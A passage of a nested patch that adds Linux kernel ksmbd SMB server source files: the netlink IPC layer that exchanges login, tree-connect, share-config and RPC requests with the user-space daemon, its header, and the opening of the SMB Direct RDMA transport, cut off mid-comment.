++		server_conf.max_connections = req->max_connections;
++
++	ret = ksmbd_set_netbios_name(req->netbios_name);
++	ret |= ksmbd_set_server_string(req->server_string);
++	ret |= ksmbd_set_work_group(req->work_group);
++	ret |= ksmbd_tcp_set_interfaces(KSMBD_STARTUP_CONFIG_INTERFACES(req),
++					req->ifc_list_sz);
++	if (ret) {
++		pr_err("Server configuration error: %s %s %s\n",
++		       req->netbios_name, req->server_string,
++		       req->work_group);
++		return ret;
++	}
++
++	if (req->min_prot[0]) {
++		ret = ksmbd_lookup_protocol_idx(req->min_prot);
++		if (ret >= 0)
++			server_conf.min_protocol = ret;
++	}
++	if (req->max_prot[0]) {
++		ret = ksmbd_lookup_protocol_idx(req->max_prot);
++		if (ret >= 0)
++			server_conf.max_protocol = ret;
++	}
++
++	if (server_conf.ipc_timeout)
++		schedule_delayed_work(&ipc_timer_work, server_conf.ipc_timeout);
++	return 0;
++}
++
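++/*
++ * STARTING_UP from the daemon: on a fresh start apply the supplied
++ * configuration and queue server initialization; if a daemon is
++ * already registered, only take over when it no longer answers a
++ * heartbeat.
++ */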
++static int handle_startup_event(struct sk_buff *skb, struct genl_info *info)
++{
++	int ret = 0;
++
++#ifdef CONFIG_SMB_SERVER_CHECK_CAP_NET_ADMIN
++	if (!netlink_capable(skb, CAP_NET_ADMIN))
++		return -EPERM;
++#endif
++
++	if (!ksmbd_ipc_validate_version(info))
++		return -EINVAL;
++
++	if (!info->attrs[KSMBD_EVENT_STARTING_UP])
++		return -EINVAL;
++
++	mutex_lock(&startup_lock);
++	if (!ksmbd_server_configurable()) {
++		mutex_unlock(&startup_lock);
++		pr_err("Server reset is in progress, can't start daemon\n");
++		return -EINVAL;
++	}
++
++	if (ksmbd_tools_pid) {
++		if (ksmbd_ipc_heartbeat_request() == 0) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		pr_err("Reconnect to a new user space daemon\n");
++	} else {
++		struct ksmbd_startup_request *req;
++
++		req = nla_data(info->attrs[info->genlhdr->cmd]);
++		ret = ipc_server_config_on_startup(req);
++		if (ret)
++			goto out;
++		server_queue_ctrl_init_work();
++	}
++
++	ksmbd_tools_pid = info->snd_portid;
++	ipc_update_last_active();
++
++out:
++	mutex_unlock(&startup_lock);
++	return ret;
++}
++
++static int handle_unsupported_event(struct sk_buff *skb, struct genl_info *info)
++{
++	pr_err("Unknown IPC event: %d, ignore.\n", info->genlhdr->cmd);
++	return -EINVAL;
++}
++
++static int handle_generic_event(struct sk_buff *skb, struct genl_info *info)
++{
++	void *payload;
++	int sz;
++	int type = info->genlhdr->cmd;
++
++#ifdef CONFIG_SMB_SERVER_CHECK_CAP_NET_ADMIN
++	if (!netlink_capable(skb, CAP_NET_ADMIN))
++		return -EPERM;
++#endif
++
++	if (type >= KSMBD_EVENT_MAX) {
++		WARN_ON(1);
++		return -EINVAL;
++	}
++
++	if (!ksmbd_ipc_validate_version(info))
++		return -EINVAL;
++
++	if (!info->attrs[type])
++		return -EINVAL;
++
++	payload = nla_data(info->attrs[info->genlhdr->cmd]);
++	sz = nla_len(info->attrs[info->genlhdr->cmd]);
++	return handle_response(type, payload, sz);
++}
++
++static int ipc_msg_send(struct ksmbd_ipc_msg *msg)
++{
++	struct genlmsghdr *nlh;
++	struct sk_buff *skb;
++	int ret = -EINVAL;
++
++	if (!ksmbd_tools_pid)
++		return ret;
++
++	skb = genlmsg_new(msg->sz, GFP_KERNEL);
++	if (!skb)
++		return -ENOMEM;
++
++	nlh = genlmsg_put(skb, 0, 0, &ksmbd_genl_family, 0, msg->type);
++	if (!nlh)
++		goto out;
++
++	ret = nla_put(skb, msg->type, msg->sz, msg->payload);
++	if (ret) {
++		genlmsg_cancel(skb, nlh);
++		goto out;
++	}
++
++	genlmsg_end(skb, nlh);
++	ret = genlmsg_unicast(&init_net, skb, ksmbd_tools_pid);
++	if (!ret)
++		ipc_update_last_active();
++	return ret;
++
++out:
++	nlmsg_free(skb);
++	return ret;
++}
++
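++/*
++ * Send a request to the user-space daemon and wait up to
++ * IPC_WAIT_TIMEOUT for the matching response.  The handle keys a
++ * temporary ipc_msg_table entry through which handle_response()
++ * hands back the payload.  Returns the response payload, or NULL on
++ * send failure, timeout or interruption.
++ */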
++static void *ipc_msg_send_request(struct ksmbd_ipc_msg *msg, unsigned int handle)
++{
++	struct ipc_msg_table_entry entry;
++	int ret;
++
++	if ((int)handle < 0)
++		return NULL;
++
++	entry.type = msg->type;
++	entry.response = NULL;
++	init_waitqueue_head(&entry.wait);
++
++	down_write(&ipc_msg_table_lock);
++	entry.handle = handle;
++	hash_add(ipc_msg_table, &entry.ipc_table_hlist, entry.handle);
++	up_write(&ipc_msg_table_lock);
++
++	ret = ipc_msg_send(msg);
++	if (ret)
++		goto out;
++
++	ret = wait_event_interruptible_timeout(entry.wait,
++					       entry.response != NULL,
++					       IPC_WAIT_TIMEOUT);
++out:
++	down_write(&ipc_msg_table_lock);
++	hash_del(&entry.ipc_table_hlist);
++	up_write(&ipc_msg_table_lock);
++	return entry.response;
++}
++
++static int ksmbd_ipc_heartbeat_request(void)
++{
++	struct ksmbd_ipc_msg *msg;
++	int ret;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_heartbeat));
++	if (!msg)
++		return -EINVAL;
++
++	msg->type = KSMBD_EVENT_HEARTBEAT_REQUEST;
++	ret = ipc_msg_send(msg);
++	ipc_msg_free(msg);
++	return ret;
++}
++
++struct ksmbd_login_response *ksmbd_ipc_login_request(const char *account)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_login_request *req;
++	struct ksmbd_login_response *resp;
++
++	if (strlen(account) >= KSMBD_REQ_MAX_ACCOUNT_NAME_SZ)
++		return NULL;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_login_request));
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_LOGIN_REQUEST;
++	req = (struct ksmbd_login_request *)msg->payload;
++	req->handle = ksmbd_acquire_id(&ipc_ida);
++	strscpy(req->account, account, KSMBD_REQ_MAX_ACCOUNT_NAME_SZ);
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_handle_free(req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_spnego_authen_response *
++ksmbd_ipc_spnego_authen_request(const char *spnego_blob, int blob_len)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_spnego_authen_request *req;
++	struct ksmbd_spnego_authen_response *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_spnego_authen_request) +
++			blob_len + 1);
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST;
++	req = (struct ksmbd_spnego_authen_request *)msg->payload;
++	req->handle = ksmbd_acquire_id(&ipc_ida);
++	req->spnego_blob_len = blob_len;
++	memcpy(req->spnego_blob, spnego_blob, blob_len);
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_handle_free(req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_tree_connect_response *
++ksmbd_ipc_tree_connect_request(struct ksmbd_session *sess,
++			       struct ksmbd_share_config *share,
++			       struct ksmbd_tree_connect *tree_conn,
++			       struct sockaddr *peer_addr)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_tree_connect_request *req;
++	struct ksmbd_tree_connect_response *resp;
++
++	if (strlen(user_name(sess->user)) >= KSMBD_REQ_MAX_ACCOUNT_NAME_SZ)
++		return NULL;
++
++	if (strlen(share->name) >= KSMBD_REQ_MAX_SHARE_NAME)
++		return NULL;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_tree_connect_request));
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_TREE_CONNECT_REQUEST;
++	req = (struct ksmbd_tree_connect_request *)msg->payload;
++
++	req->handle = ksmbd_acquire_id(&ipc_ida);
++	req->account_flags = sess->user->flags;
++	req->session_id = sess->id;
++	req->connect_id = tree_conn->id;
++	strscpy(req->account, user_name(sess->user), KSMBD_REQ_MAX_ACCOUNT_NAME_SZ);
++	strscpy(req->share, share->name, KSMBD_REQ_MAX_SHARE_NAME);
++	snprintf(req->peer_addr, sizeof(req->peer_addr), "%pIS", peer_addr);
++
++	if (peer_addr->sa_family == AF_INET6)
++		req->flags |= KSMBD_TREE_CONN_FLAG_REQUEST_IPV6;
++	if (test_session_flag(sess, CIFDS_SESSION_FLAG_SMB2))
++		req->flags |= KSMBD_TREE_CONN_FLAG_REQUEST_SMB2;
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_handle_free(req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++int ksmbd_ipc_tree_disconnect_request(unsigned long long session_id,
++				      unsigned long long connect_id)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_tree_disconnect_request *req;
++	int ret;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_tree_disconnect_request));
++	if (!msg)
++		return -ENOMEM;
++
++	msg->type = KSMBD_EVENT_TREE_DISCONNECT_REQUEST;
++	req = (struct ksmbd_tree_disconnect_request *)msg->payload;
++	req->session_id = session_id;
++	req->connect_id = connect_id;
++
++	ret = ipc_msg_send(msg);
++	ipc_msg_free(msg);
++	return ret;
++}
++
++int ksmbd_ipc_logout_request(const char *account, int flags)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_logout_request *req;
++	int ret;
++
++	if (strlen(account) >= KSMBD_REQ_MAX_ACCOUNT_NAME_SZ)
++		return -EINVAL;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_logout_request));
++	if (!msg)
++		return -ENOMEM;
++
++	msg->type = KSMBD_EVENT_LOGOUT_REQUEST;
++	req = (struct ksmbd_logout_request *)msg->payload;
++	req->account_flags = flags;
++	strscpy(req->account, account, KSMBD_REQ_MAX_ACCOUNT_NAME_SZ);
++
++	ret = ipc_msg_send(msg);
++	ipc_msg_free(msg);
++	return ret;
++}
++
++struct ksmbd_share_config_response *
++ksmbd_ipc_share_config_request(const char *name)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_share_config_request *req;
++	struct ksmbd_share_config_response *resp;
++
++	if (strlen(name) >= KSMBD_REQ_MAX_SHARE_NAME)
++		return NULL;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_share_config_request));
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_SHARE_CONFIG_REQUEST;
++	req = (struct ksmbd_share_config_request *)msg->payload;
++	req->handle = ksmbd_acquire_id(&ipc_ida);
++	strscpy(req->share_name, name, KSMBD_REQ_MAX_SHARE_NAME);
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_handle_free(req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_rpc_command *ksmbd_rpc_open(struct ksmbd_session *sess, int handle)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_rpc_command *req;
++	struct ksmbd_rpc_command *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command));
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_RPC_REQUEST;
++	req = (struct ksmbd_rpc_command *)msg->payload;
++	req->handle = handle;
++	req->flags = ksmbd_session_rpc_method(sess, handle);
++	req->flags |= KSMBD_RPC_OPEN_METHOD;
++	req->payload_sz = 0;
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_rpc_command *ksmbd_rpc_close(struct ksmbd_session *sess, int handle)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_rpc_command *req;
++	struct ksmbd_rpc_command *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command));
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_RPC_REQUEST;
++	req = (struct ksmbd_rpc_command *)msg->payload;
++	req->handle = handle;
++	req->flags = ksmbd_session_rpc_method(sess, handle);
++	req->flags |= KSMBD_RPC_CLOSE_METHOD;
++	req->payload_sz = 0;
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_rpc_command *ksmbd_rpc_write(struct ksmbd_session *sess, int handle,
++					  void *payload, size_t payload_sz)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_rpc_command *req;
++	struct ksmbd_rpc_command *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command) + payload_sz + 1);
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_RPC_REQUEST;
++	req = (struct ksmbd_rpc_command *)msg->payload;
++	req->handle = handle;
++	req->flags = ksmbd_session_rpc_method(sess, handle);
++	req->flags |= rpc_context_flags(sess);
++	req->flags |= KSMBD_RPC_WRITE_METHOD;
++	req->payload_sz = payload_sz;
++	memcpy(req->payload, payload, payload_sz);
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_rpc_command *ksmbd_rpc_read(struct ksmbd_session *sess, int handle)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_rpc_command *req;
++	struct ksmbd_rpc_command *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command));
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_RPC_REQUEST;
++	req = (struct ksmbd_rpc_command *)msg->payload;
++	req->handle = handle;
++	req->flags = ksmbd_session_rpc_method(sess, handle);
++	req->flags |= rpc_context_flags(sess);
++	req->flags |= KSMBD_RPC_READ_METHOD;
++	req->payload_sz = 0;
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_rpc_command *ksmbd_rpc_ioctl(struct ksmbd_session *sess, int handle,
++					  void *payload, size_t payload_sz)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_rpc_command *req;
++	struct ksmbd_rpc_command *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command) + payload_sz + 1);
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_RPC_REQUEST;
++	req = (struct ksmbd_rpc_command *)msg->payload;
++	req->handle = handle;
++	req->flags = ksmbd_session_rpc_method(sess, handle);
++	req->flags |= rpc_context_flags(sess);
++	req->flags |= KSMBD_RPC_IOCTL_METHOD;
++	req->payload_sz = payload_sz;
++	memcpy(req->payload, payload, payload_sz);
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
++struct ksmbd_rpc_command *ksmbd_rpc_rap(struct ksmbd_session *sess, void *payload,
++					size_t payload_sz)
++{
++	struct ksmbd_ipc_msg *msg;
++	struct ksmbd_rpc_command *req;
++	struct ksmbd_rpc_command *resp;
++
++	msg = ipc_msg_alloc(sizeof(struct ksmbd_rpc_command) + payload_sz + 1);
++	if (!msg)
++		return NULL;
++
++	msg->type = KSMBD_EVENT_RPC_REQUEST;
++	req = (struct ksmbd_rpc_command *)msg->payload;
++	req->handle = ksmbd_acquire_id(&ipc_ida);
++	req->flags = rpc_context_flags(sess);
++	req->flags |= KSMBD_RPC_RAP_METHOD;
++	req->payload_sz = payload_sz;
++	memcpy(req->payload, payload, payload_sz);
++
++	resp = ipc_msg_send_request(msg, req->handle);
++	ipc_msg_handle_free(req->handle);
++	ipc_msg_free(msg);
++	return resp;
++}
++
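++/*
++ * Periodic daemon liveness check.  While IPC traffic keeps
++ * ipc_last_active fresh, or a heartbeat send still succeeds, the
++ * work re-arms itself; otherwise the server state is set to
++ * SERVER_STATE_RESETTING and -EINVAL is returned so the caller can
++ * queue the reset work.
++ */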
++static int __ipc_heartbeat(void)
++{
++	unsigned long delta;
++
++	if (!ksmbd_server_running())
++		return 0;
++
++	if (time_after(jiffies, server_conf.ipc_last_active)) {
++		delta = (jiffies - server_conf.ipc_last_active);
++	} else {
++		ipc_update_last_active();
++		schedule_delayed_work(&ipc_timer_work,
++				      server_conf.ipc_timeout);
++		return 0;
++	}
++
++	if (delta < server_conf.ipc_timeout) {
++		schedule_delayed_work(&ipc_timer_work,
++				      server_conf.ipc_timeout - delta);
++		return 0;
++	}
++
++	if (ksmbd_ipc_heartbeat_request() == 0) {
++		schedule_delayed_work(&ipc_timer_work,
++				      server_conf.ipc_timeout);
++		return 0;
++	}
++
++	mutex_lock(&startup_lock);
++	WRITE_ONCE(server_conf.state, SERVER_STATE_RESETTING);
++	server_conf.ipc_last_active = 0;
++	ksmbd_tools_pid = 0;
++	pr_err("No IPC daemon response for %lus\n", delta / HZ);
++	mutex_unlock(&startup_lock);
++	return -EINVAL;
++}
++
++static void ipc_timer_heartbeat(struct work_struct *w)
++{
++	if (__ipc_heartbeat())
++		server_queue_ctrl_reset_work();
++}
++
++int ksmbd_ipc_id_alloc(void)
++{
++	return ksmbd_acquire_id(&ipc_ida);
++}
++
++void ksmbd_rpc_id_free(int handle)
++{
++	ksmbd_release_id(&ipc_ida, handle);
++}
++
++void ksmbd_ipc_release(void)
++{
++	cancel_delayed_work_sync(&ipc_timer_work);
++	genl_unregister_family(&ksmbd_genl_family);
++}
++
++void ksmbd_ipc_soft_reset(void)
++{
++	mutex_lock(&startup_lock);
++	ksmbd_tools_pid = 0;
++	cancel_delayed_work_sync(&ipc_timer_work);
++	mutex_unlock(&startup_lock);
++}
++
++int ksmbd_ipc_init(void)
++{
++	int ret = 0;
++
++	ksmbd_nl_init_fixup();
++	INIT_DELAYED_WORK(&ipc_timer_work, ipc_timer_heartbeat);
++
++	ret = genl_register_family(&ksmbd_genl_family);
++	if (ret) {
++		pr_err("Failed to register KSMBD netlink interface %d\n", ret);
++		cancel_delayed_work_sync(&ipc_timer_work);
++	}
++
++	return ret;
++}
+diff --git a/fs/smb/server/transport_ipc.h b/fs/smb/server/transport_ipc.h
+new file mode 100644
+index 0000000000000..5e5b90a0c1879
+--- /dev/null
++++ b/fs/smb/server/transport_ipc.h
+@@ -0,0 +1,47 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_TRANSPORT_IPC_H__
++#define __KSMBD_TRANSPORT_IPC_H__
++
++#include <linux/wait.h>
++
++#define KSMBD_IPC_MAX_PAYLOAD	4096
++
++struct ksmbd_login_response *
++ksmbd_ipc_login_request(const char *account);
++
++struct ksmbd_session;
++struct ksmbd_share_config;
++struct ksmbd_tree_connect;
++struct sockaddr;
++
++struct ksmbd_tree_connect_response *
++ksmbd_ipc_tree_connect_request(struct ksmbd_session *sess,
++			       struct ksmbd_share_config *share,
++			       struct ksmbd_tree_connect *tree_conn,
++			       struct sockaddr *peer_addr);
++int ksmbd_ipc_tree_disconnect_request(unsigned long long session_id,
++				      unsigned long long connect_id);
++int ksmbd_ipc_logout_request(const char *account, int flags);
++struct ksmbd_share_config_response *
++ksmbd_ipc_share_config_request(const char *name);
++struct ksmbd_spnego_authen_response *
++ksmbd_ipc_spnego_authen_request(const char *spnego_blob, int blob_len);
++int ksmbd_ipc_id_alloc(void);
++void ksmbd_rpc_id_free(int handle);
++struct ksmbd_rpc_command *ksmbd_rpc_open(struct ksmbd_session *sess, int handle);
++struct ksmbd_rpc_command *ksmbd_rpc_close(struct ksmbd_session *sess, int handle);
++struct ksmbd_rpc_command *ksmbd_rpc_write(struct ksmbd_session *sess, int handle,
++					  void *payload, size_t payload_sz);
++struct ksmbd_rpc_command *ksmbd_rpc_read(struct ksmbd_session *sess, int handle);
++struct ksmbd_rpc_command *ksmbd_rpc_ioctl(struct ksmbd_session *sess, int handle,
++					  void *payload, size_t payload_sz);
++struct ksmbd_rpc_command *ksmbd_rpc_rap(struct ksmbd_session *sess, void *payload,
++					size_t payload_sz);
++void ksmbd_ipc_release(void);
++void ksmbd_ipc_soft_reset(void);
++int ksmbd_ipc_init(void);
++#endif /* __KSMBD_TRANSPORT_IPC_H__ */
+diff --git a/fs/smb/server/transport_rdma.c b/fs/smb/server/transport_rdma.c
+new file mode 100644
+index 0000000000000..c06efc020bd95
+--- /dev/null
++++ b/fs/smb/server/transport_rdma.c
+@@ -0,0 +1,2273 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2017, Microsoft Corporation.
++ *   Copyright (C) 2018, LG Electronics.
++ *
++ *   Author(s): Long Li <longli@microsoft.com>,
++ *		Hyunchul Lee <hyc.lee@gmail.com>
++ */
++
++#define SUBMOD_NAME	"smb_direct"
++
++#include <linux/kthread.h>
++#include <linux/list.h>
++#include <linux/mempool.h>
++#include <linux/highmem.h>
++#include <linux/scatterlist.h>
++#include <rdma/ib_verbs.h>
++#include <rdma/rdma_cm.h>
++#include <rdma/rw.h>
++
++#include "glob.h"
++#include "connection.h"
++#include "smb_common.h"
++#include "smbstatus.h"
++#include "transport_rdma.h"
++
++#define SMB_DIRECT_PORT_IWARP		5445
++#define SMB_DIRECT_PORT_INFINIBAND	445
++
++#define SMB_DIRECT_VERSION_LE		cpu_to_le16(0x0100)
++
++/* SMB_DIRECT negotiation timeout in seconds */
++#define SMB_DIRECT_NEGOTIATE_TIMEOUT		120
++
++#define SMB_DIRECT_MAX_SEND_SGES		6
++#define SMB_DIRECT_MAX_RECV_SGES		1
++
++/*
++ * Default maximum number of RDMA read/write outstanding on this connection
++ * This value is possibly decreased during QP creation on hardware limit
++ */
++#define SMB_DIRECT_CM_INITIATOR_DEPTH		8
++
++/* Maximum number of retries on data transfer operations */
++#define SMB_DIRECT_CM_RETRY			6
++/* No need to retry on Receiver Not Ready since SMB_DIRECT manages credits */
++#define SMB_DIRECT_CM_RNR_RETRY		0
++
++/*
++ * User configurable initial values per SMB_DIRECT transport connection
++ * as defined in [MS-SMBD] 3.1.1.1
++ * Those may change after a SMB_DIRECT negotiation
++ */
++
++/* Default to the InfiniBand port (445) as the SMB Direct port */
++static int smb_direct_port = SMB_DIRECT_PORT_INFINIBAND;
++
++/* The local peer's maximum number of credits to grant to the peer */
++static int smb_direct_receive_credit_max = 255;
++
++/* The number of send credits the local peer requests from the remote peer */
++static int smb_direct_send_credit_target = 255;
++
++/* The maximum single message size that can be sent to the remote peer */
++static int smb_direct_max_send_size = 1364;
++
++/*  The maximum fragmented upper-layer payload receive size supported */
++static int smb_direct_max_fragmented_recv_size = 1024 * 1024;
++
++/*  The maximum single-message size which can be received */
++static int smb_direct_max_receive_size = 1364;
++
++static int smb_direct_max_read_write_size = SMBD_DEFAULT_IOSIZE;
++
++static LIST_HEAD(smb_direct_device_list);
++static DEFINE_RWLOCK(smb_direct_device_lock);
++
++struct smb_direct_device {
++	struct ib_device	*ib_dev;
++	struct list_head	list;
++};
++
++static struct smb_direct_listener {
++	struct rdma_cm_id	*cm_id;
++} smb_direct_listener;
++
++static struct workqueue_struct *smb_direct_wq;
++
++enum smb_direct_status {
++	SMB_DIRECT_CS_NEW = 0,
++	SMB_DIRECT_CS_CONNECTED,
++	SMB_DIRECT_CS_DISCONNECTING,
++	SMB_DIRECT_CS_DISCONNECTED,
++};
++
++struct smb_direct_transport {
++	struct ksmbd_transport	transport;
++
++	enum smb_direct_status	status;
++	bool			full_packet_received;
++	wait_queue_head_t	wait_status;
++
++	struct rdma_cm_id	*cm_id;
++	struct ib_cq		*send_cq;
++	struct ib_cq		*recv_cq;
++	struct ib_pd		*pd;
++	struct ib_qp		*qp;
++
++	int			max_send_size;
++	int			max_recv_size;
++	int			max_fragmented_send_size;
++	int			max_fragmented_recv_size;
++	int			max_rdma_rw_size;
++
++	spinlock_t		reassembly_queue_lock;
++	struct list_head	reassembly_queue;
++	int			reassembly_data_length;
++	int			reassembly_queue_length;
++	int			first_entry_offset;
++	wait_queue_head_t	wait_reassembly_queue;
++
++	spinlock_t		receive_credit_lock;
++	int			recv_credits;
++	int			count_avail_recvmsg;
++	int			recv_credit_max;
++	int			recv_credit_target;
++
++	spinlock_t		recvmsg_queue_lock;
++	struct list_head	recvmsg_queue;
++
++	spinlock_t		empty_recvmsg_queue_lock;
++	struct list_head	empty_recvmsg_queue;
++
++	int			send_credit_target;
++	atomic_t		send_credits;
++	spinlock_t		lock_new_recv_credits;
++	int			new_recv_credits;
++	int			max_rw_credits;
++	int			pages_per_rw_credit;
++	atomic_t		rw_credits;
++
++	wait_queue_head_t	wait_send_credits;
++	wait_queue_head_t	wait_rw_credits;
++
++	mempool_t		*sendmsg_mempool;
++	struct kmem_cache	*sendmsg_cache;
++	mempool_t		*recvmsg_mempool;
++	struct kmem_cache	*recvmsg_cache;
++
++	wait_queue_head_t	wait_send_pending;
++	atomic_t		send_pending;
++
++	struct delayed_work	post_recv_credits_work;
++	struct work_struct	send_immediate_work;
++	struct work_struct	disconnect_work;
++
++	bool			negotiation_requested;
++};
++
++#define KSMBD_TRANS(t) ((struct ksmbd_transport *)&((t)->transport))
++
++enum {
++	SMB_DIRECT_MSG_NEGOTIATE_REQ = 0,
++	SMB_DIRECT_MSG_DATA_TRANSFER
++};
++
++static struct ksmbd_transport_ops ksmbd_smb_direct_transport_ops;
++
++struct smb_direct_send_ctx {
++	struct list_head	msg_list;
++	int			wr_cnt;
++	bool			need_invalidate_rkey;
++	unsigned int		remote_key;
++};
++
++struct smb_direct_sendmsg {
++	struct smb_direct_transport	*transport;
++	struct ib_send_wr	wr;
++	struct list_head	list;
++	int			num_sge;
++	struct ib_sge		sge[SMB_DIRECT_MAX_SEND_SGES];
++	struct ib_cqe		cqe;
++	u8			packet[];
++};
++
++struct smb_direct_recvmsg {
++	struct smb_direct_transport	*transport;
++	struct list_head	list;
++	int			type;
++	struct ib_sge		sge;
++	struct ib_cqe		cqe;
++	bool			first_segment;
++	u8			packet[];
++};
++
++struct smb_direct_rdma_rw_msg {
++	struct smb_direct_transport	*t;
++	struct ib_cqe		cqe;
++	int			status;
++	struct completion	*completion;
++	struct list_head	list;
++	struct rdma_rw_ctx	rw_ctx;
++	struct sg_table		sgt;
++	struct scatterlist	sg_list[];
++};
++
++void init_smbd_max_io_size(unsigned int sz)
++{
++	sz = clamp_val(sz, SMBD_MIN_IOSIZE, SMBD_MAX_IOSIZE);
++	smb_direct_max_read_write_size = sz;
++}
++
++unsigned int get_smbd_max_read_write_size(void)
++{
++	return smb_direct_max_read_write_size;
++}
++
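++/*
++ * Number of pages spanned by a buffer that need not be page-aligned:
++ * index one past the last page minus the index of the first page.
++ */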
++static inline int get_buf_page_count(void *buf, int size)
++{
++	return DIV_ROUND_UP((uintptr_t)buf + size, PAGE_SIZE) -
++		(uintptr_t)buf / PAGE_SIZE;
++}
++
++static void smb_direct_destroy_pools(struct smb_direct_transport *transport);
++static void smb_direct_post_recv_credits(struct work_struct *work);
++static int smb_direct_post_send_data(struct smb_direct_transport *t,
++				     struct smb_direct_send_ctx *send_ctx,
++				     struct kvec *iov, int niov,
++				     int remaining_data_length);
++
++static inline struct smb_direct_transport *
++smb_trans_direct_transfort(struct ksmbd_transport *t)
++{
++	return container_of(t, struct smb_direct_transport, transport);
++}
++
++static inline void
++*smb_direct_recvmsg_payload(struct smb_direct_recvmsg *recvmsg)
++{
++	return (void *)recvmsg->packet;
++}
++
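++/*
++ * Refill receive credits once they drop to 1/8 of the maximum or
++ * less, provided spare receive buffers amount to at least a quarter
++ * of the remaining credits.
++ */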
++static inline bool is_receive_credit_post_required(int receive_credits,
++						   int avail_recvmsg_count)
++{
++	return receive_credits <= (smb_direct_receive_credit_max >> 3) &&
++		avail_recvmsg_count >= (receive_credits >> 2);
++}
++
++static struct
++smb_direct_recvmsg *get_free_recvmsg(struct smb_direct_transport *t)
++{
++	struct smb_direct_recvmsg *recvmsg = NULL;
++
++	spin_lock(&t->recvmsg_queue_lock);
++	if (!list_empty(&t->recvmsg_queue)) {
++		recvmsg = list_first_entry(&t->recvmsg_queue,
++					   struct smb_direct_recvmsg,
++					   list);
++		list_del(&recvmsg->list);
++	}
++	spin_unlock(&t->recvmsg_queue_lock);
++	return recvmsg;
++}
++
++static void put_recvmsg(struct smb_direct_transport *t,
++			struct smb_direct_recvmsg *recvmsg)
++{
++	ib_dma_unmap_single(t->cm_id->device, recvmsg->sge.addr,
++			    recvmsg->sge.length, DMA_FROM_DEVICE);
++
++	spin_lock(&t->recvmsg_queue_lock);
++	list_add(&recvmsg->list, &t->recvmsg_queue);
++	spin_unlock(&t->recvmsg_queue_lock);
++}
++
++static struct
++smb_direct_recvmsg *get_empty_recvmsg(struct smb_direct_transport *t)
++{
++	struct smb_direct_recvmsg *recvmsg = NULL;
++
++	spin_lock(&t->empty_recvmsg_queue_lock);
++	if (!list_empty(&t->empty_recvmsg_queue)) {
++		recvmsg = list_first_entry(&t->empty_recvmsg_queue,
++					   struct smb_direct_recvmsg, list);
++		list_del(&recvmsg->list);
++	}
++	spin_unlock(&t->empty_recvmsg_queue_lock);
++	return recvmsg;
++}
++
++static void put_empty_recvmsg(struct smb_direct_transport *t,
++			      struct smb_direct_recvmsg *recvmsg)
++{
++	ib_dma_unmap_single(t->cm_id->device, recvmsg->sge.addr,
++			    recvmsg->sge.length, DMA_FROM_DEVICE);
++
++	spin_lock(&t->empty_recvmsg_queue_lock);
++	list_add_tail(&recvmsg->list, &t->empty_recvmsg_queue);
++	spin_unlock(&t->empty_recvmsg_queue_lock);
++}
++
++static void enqueue_reassembly(struct smb_direct_transport *t,
++			       struct smb_direct_recvmsg *recvmsg,
++			       int data_length)
++{
++	spin_lock(&t->reassembly_queue_lock);
++	list_add_tail(&recvmsg->list, &t->reassembly_queue);
++	t->reassembly_queue_length++;
++	/*
